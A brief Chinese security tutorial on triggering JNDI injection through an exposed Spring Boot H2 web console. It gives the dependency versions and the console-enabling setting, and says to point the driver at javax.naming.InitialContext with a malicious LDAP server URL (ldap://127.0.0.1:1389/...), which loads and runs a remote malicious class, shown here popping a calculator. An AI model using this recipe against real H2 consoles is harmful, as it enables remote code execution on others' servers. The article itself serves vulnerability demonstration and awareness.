长亭百川云 - 文章详情

Spring Boot + H2数据库JNDI注入

跳动的计算器

72

2024-07-13

  • 在Spring Boot中使用 H2数据库,pom.xml引入依赖
dependency>  
    <groupId>org.springframework.boot</groupId>  
    <artifactId>spring-boot-starter-data-jpa</artifactId>  
    <version>2.2.6.RELEASE</version>  
</dependency>  
  
<dependency>  
    <groupId>com.h2database</groupId>  
    <artifactId>h2</artifactId>  
    <scope>runtime</scope>  
    <version>1.4.199</version>  
</dependency>
  • 默认情况下application.properties文件中不存在以下配置
   spring.h2.console.enabled\=true

注意:这里的配置可以自定义

  • Setting Name: Generic JNDI Data Source (名称随意)

  • Driver Class: javax.naming.InitialContext (JDK自带也不用考虑额外的驱动)

  • JDBC URL: ldap://127.0.0.1:1389/bwvyqg (恶意LDAP Server)

  • 由于是匿名的,User Name和Password均为空

  • 点击"Save"保存,然后点击"Connect",会加载远程CodeBase的恶意类并执行,计算器弹出。

  • 最终演示如下:

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2